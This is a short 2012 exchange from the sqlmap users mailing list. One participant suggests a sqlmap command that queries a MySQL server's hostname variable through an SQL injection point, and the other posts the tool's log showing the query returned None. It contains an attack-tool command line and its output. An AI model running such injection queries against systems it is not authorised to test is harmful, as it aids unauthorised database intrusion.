On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leonja...@gmail.com> wrote:

> If its MySQL and according to [1], try:
>
> $ python sqlmap.py -u something --sql-query="show variables where
> Variable_name = 'hostname'"
>
> I am not 100% sure about the required permissions/escaping that might be
> needed to achieve this via your injection point though...

Here's the result: Is it not possible from the injection point? Or are
there any other sql-query?

back-end DBMS: MySQL 5.0
[15:43:37] [INFO] fetching SQL SELECT statement query output: 'show
variables where Variable_name = 'hostname''
[15:43:37] [WARNING] reflective value(s) found and filtering out
[15:43:37] [INFO] resumed: None
show variables where Variable_name = 'hostname':    'None'

-- 
Zaki Akhmad

------------------------------------------------------------------------------
Keep yourself connected to Go Parallel: 
INSIGHTS What's next for parallel hardware, programming and related areas?
Interviews and blogs by thought leaders keep you ahead of the curve.
http://goparallel.sourceforge.net
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to